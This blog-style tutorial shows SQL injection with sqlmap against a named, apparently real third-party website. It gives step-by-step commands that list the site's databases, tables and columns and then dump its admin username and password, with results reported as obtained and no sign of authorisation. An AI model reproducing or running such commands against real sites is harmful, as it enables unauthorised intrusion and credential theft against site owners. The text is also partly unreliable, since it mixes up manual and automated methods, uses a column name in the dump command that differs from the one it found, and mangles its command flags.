SQL injection using Sqlmap
SQL injection is a code injection technique that might destroy database.SQL injection is one of the most common web hacking techniques.SQL injection is the placement of malicious code in SQL statements, via web page input. We can inject SQL in many ways like manual way, using sqlmap, using Havij, but the best way is manual SQL injection. In another writeup, I will discuss how to perform manual SQL injection. In this time I will show manual SQL injection using Sqlmap,sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It is a pre-install in Kali Linux. One of the negative sides of this tool is, it takes too much time to perform SQL injection. So I recommend manual SQL injection for perform SQL injection.
For SQL injection first, you need to find out a SQL injection point and test if the injection point is vulnerable or not. Our target for this blog is to find out the admin username and password.
For this blog I am using this SQL point:
http://www.brightbrothers.co.in/products.php?id=28
This is a SQL injection point and if we use ( ‘ ) or %27 after 28 then we can see some content is removed from the page. So there is a vulnerability on this SQL injection point. We can try SQL injection in this SQL point .lets do it by Sqlmap.
http://www.brightbrothers.co.in/products.php?id=28’
Step1: Open a terminal and type sqlmap , For the manual of the tool you can use man sqlmap
Step2: First we need to find out the Database name. So we can use this command to find the database name.
sqlmap -u TARGET URL — dbs
sqlmap -u http://www.brightbrothers.co.in/products.php?id=28 — dbs
We get two databases.One is britedb121 and another one is information_schema , Now we continue for britedb121
Step3: Now we have the Database name, we need to find the Table name now .so use this command:
sqlmap -u TARGET URL -D db_name — tables
sqlmap -u http://www.brightbrothers.co.in/products.php?id=28 -D britedb121 — tables
We get 9 tables. One of them is the admin table, so for admin information, we need to use the admin table.
Step4: We get the Database name and table name, now we need to find the column name of the user table .so use this command:
sqlmap -u TARGET URL -D db_name -T table_name — columns
sqlmap -u http://www.brightbrothers.co.in/products.php?id=28 -D britedb121 -T admin — columns
We get 2 columns, user and password.
Step5: Now we have the database, table, column name, Now we want to get data from the column. We need to find out the username and password.so can use this command:
sqlmap -u TARGET URL -D db_name -T table_name -C columns — dump sqlmap -u http://www.brightbrothers.co.in/products.php?id=28 -D britedb121 -T admin -C user,pass — dump
We get the username and password. Sometimes the password may be encrypted, this time we need to decrypt it.